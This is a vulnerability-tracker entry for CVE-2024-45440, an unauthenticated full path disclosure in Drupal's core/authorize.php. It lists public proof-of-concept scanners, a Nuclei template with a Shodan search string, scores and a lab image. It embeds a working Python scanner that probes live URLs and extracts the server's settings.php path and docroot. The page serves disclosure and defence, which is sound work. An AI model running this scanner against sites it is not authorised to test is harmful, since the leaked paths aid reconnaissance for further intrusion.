CVE-2024-45440

Severity: MEDIUM · Nuclei template available · Lab environment available

Drupal 10.3.0-10.3.5 - Full Path Disclosure via Missing hash_salt File


Exploitation Summary

EIP tracks 3 public exploits for CVE-2024-45440: PoCs published by Milad karimi, w0r1i0g1ht and zoomdbz. A Nuclei detection template is also available.

AI-analyzed exploit summary: all three PoCs are unauthenticated Python scanners that request /core/authorize.php and treat the string 'settings.php' in the response as the indicator of the full path disclosure; the first two also extract the disclosed absolute path from the response. The analyses name Drupal 11.x-dev as the target because that is the version in the NVD description; the affected release ranges are listed under Products below.

Description

core/authorize.php in Drupal 11.x-dev allows Full Path Disclosure (even when Drupal's "Error messages to display" setting is None) if the value of $settings['hash_salt'] in settings.php is the result of file_get_contents() on a file that does not exist. The PHP warning raised by the failed read ends with the absolute filesystem path of the file that made the call, which is settings.php, and authorize.php returns that warning to an unauthenticated client regardless of the display setting, so tightening the error-display setting alone does not close the leak. The NVD text names 11.x-dev; the affected release ranges are listed under Products below.
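As an added example (this is not one of the three PoCs listed below, nor the Nuclei template), the following Python script implements the detection logic the PoCs describe: request /core/authorize.php, look for the PHP warning that names settings.php, and recover the absolute path plus the docroot derived from it. The sample response bodies are constructed to mirror PHP's warning format; the paths and line number in them are invented, and the scan() helper, its User-Agent string and the result keys are this example's own choices rather than anything from the PoCs.

```python
import html
import re
import sys
import urllib.error
import urllib.request

# PHP reports a failed file_get_contents() as
#   "Warning: file_get_contents(<missing file>): Failed to open stream:
#    No such file or directory in <abs path>/settings.php on line <n>"
# (wrapped in <b> tags when html_errors is on). The absolute path of the
# file that made the call, here settings.php, is the disclosure.
PATH_RE = re.compile(r"\bin\s+((?:/|[A-Za-z]:[\\/])[^\s<>]*?settings\.php)\b")


def docroot_from_settings_path(path):
    """Strip the trailing sites/<site>/settings.php to recover the docroot."""
    m = re.match(r"^(.*?)[\\/]sites[\\/][^\\/]+[\\/]settings\.php$", path)
    return m.group(1) if m else None


def classify(body):
    """Return the disclosed settings.php path and docroot found in a response body.

    Unlike a bare substring check for 'settings.php', this only fires on the
    warning's "in <absolute path>" form, so page text that merely mentions
    settings.php is not reported as a leak.
    """
    text = html.unescape(re.sub(r"<[^>]+>", " ", body))
    m = PATH_RE.search(text)
    if not m:
        return {"vulnerable": False, "settings_path": None, "docroot": None}
    path = m.group(1)
    return {"vulnerable": True, "settings_path": path,
            "docroot": docroot_from_settings_path(path)}


def scan(base_url, timeout=10):
    """Fetch /core/authorize.php from a live target and classify the body.

    authorize.php may answer an unauthenticated request with a non-200 status,
    so error responses are inspected too: the warning is emitted while
    settings.php is being loaded, before the page body is produced.
    """
    url = base_url.rstrip("/") + "/core/authorize.php"
    req = urllib.request.Request(url, headers={"User-Agent": "cve-2024-45440-check"})
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            body = resp.read().decode("utf-8", errors="replace")
    except urllib.error.HTTPError as e:
        body = e.read().decode("utf-8", errors="replace")
    return classify(body)


# Constructed sample bodies modelled on PHP's warning format; the paths and
# line number are invented for this example.
VULNERABLE_HTML = (
    "<br />\n<b>Warning</b>:  file_get_contents(/home/example/salt.txt): "
    "Failed to open stream: No such file or directory in "
    "<b>/var/www/html/sites/default/settings.php</b> on <b>line 796</b><br />\n"
    "<!DOCTYPE html><html><body>Access denied</body></html>"
)
VULNERABLE_TEXT = (
    "Warning: file_get_contents(C:\\salt\\salt.txt): Failed to open stream: "
    "No such file or directory in C:\\xampp\\htdocs\\sites\\default\\settings.php on line 796"
)
NOISY_BODY = "<p>Edit settings.php to configure the site.</p>"
CLEAN_BODY = "<!DOCTYPE html><html><body>Access denied</body></html>"

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for target in sys.argv[1:]:
            print(target, scan(target))
    else:
        for name, body in [("html", VULNERABLE_HTML), ("text", VULNERABLE_TEXT),
                           ("noisy", NOISY_BODY), ("clean", CLEAN_BODY)]:
            print(name, classify(body))
```

Run it with one or more base URLs to check live targets, or with no arguments to run it over the constructed samples. On the configuration side, the description ties the leak to a hash_salt value built from file_get_contents() on a missing file, so the check to make on a site you operate is that the salt file settings.php reads actually exists on every host the code is deployed to; Drupal's error-display setting does not suppress this warning.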

Exploits (3)

exploitdb · Scanner
by Milad karimi · tags: python, webapps, php
https://www.exploit-db.com/exploits/52266

This script scans for CVE-2024-45440, a full path disclosure vulnerability in Drupal 11.x-dev. It checks for the presence of 'settings.php' in the response from '/core/authorize.php' and extracts the full path if vulnerable.

Classification: Scanner (90%)
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: Drupal 11.x-dev
Authentication: none needed
Prerequisites: Target must be running Drupal 11.x-dev with the vulnerable /core/authorize.php endpoint accessible
Analyzed by devstral-2, Feb 16, 2026
nomisec · Scanner · 2 stars
by w0r1i0g1ht · poc
https://github.com/w0r1i0g1ht/CVE-2024-45440

The repository contains a Python script that scans for CVE-2024-45440, a Drupal 11.x-dev Full Path Disclosure vulnerability in core/authorize.php. The script checks for the presence of 'settings.php' in the response and extracts the full path if vulnerable.

Classification: Scanner (95%)
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: Drupal 11.x-dev
Authentication: none needed
Prerequisites: Access to the target Drupal instance's core/authorize.php endpoint
Analyzed by devstral-2, Feb 19, 2026
nomisec · Scanner
by zoomdbz · poc
https://github.com/zoomdbz/CVE-2024-45440

This repository contains a Python-based scanner for CVE-2024-45440, which targets a full path disclosure vulnerability in Drupal 11.x-dev. The tool checks for the presence of sensitive paths in the response from the `/core/authorize.php` endpoint.

Classification: Scanner (95%)
Attack Type: Info Leak
Complexity: Trivial
Reliability: Reliable
Target: Drupal 11.x-dev
Authentication: none needed
Prerequisites: Access to the target Drupal instance's /core/authorize.php endpoint
Analyzed by devstral-2, Feb 19, 2026

Nuclei Templates (1)

Drupal 11.x-dev - Full Path Disclosure
Severity: MEDIUM · Verified · by DhiyaneshDK
Shodan: http.component:"drupal" || cpe:"cpe:2.3:a:drupal:drupal"


Scores

CVSS v3.1: 5.3 (Medium)
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
Attack Vector: NETWORK
EPSS: 0.8669 (percentile 99.4%)

CISA SSVC (Vulnrichment)

Exploitation: none
Automatable: no
Technical Impact: partial

The SSVC values reflect the Vulnrichment assessment at enrichment time; with three public PoCs and a Nuclei template available, the Exploitation decision point would now read "poc" on the SSVC scale (none / poc / active).

Lab Environment

Community Lab
docker pull drupal:10.1.8

Note that this image is Drupal 10.1.8, which falls outside the 10.3.0-10.3.5 range in the title and is not the 11.x-dev build named in the description. Before using it as a reference target, confirm that it actually reproduces the leak: point $settings['hash_salt'] in settings.php at file_get_contents() of a nonexistent file and request /core/authorize.php.

Details

CWE: CWE-209 (Generation of Error Message Containing Sensitive Information)
Status: published
Products (4):
  drupal/core 10.3.0 - 10.3.6 (Packagist)
  drupal/core-recommended 10.3.0 - 10.3.6 (Packagist)
  drupal/drupal 2023-05-09
  drupal/drupal 10.3.0 - 10.3.6 (Packagist)
The Packagist ranges end at 10.3.6 while the title ends at 10.3.5; the two agree if the upper bound is read as exclusive, i.e. a Composer constraint of >=10.3.0,<10.3.6.
Published: Aug 29, 2024
Tracked Since: Feb 18, 2026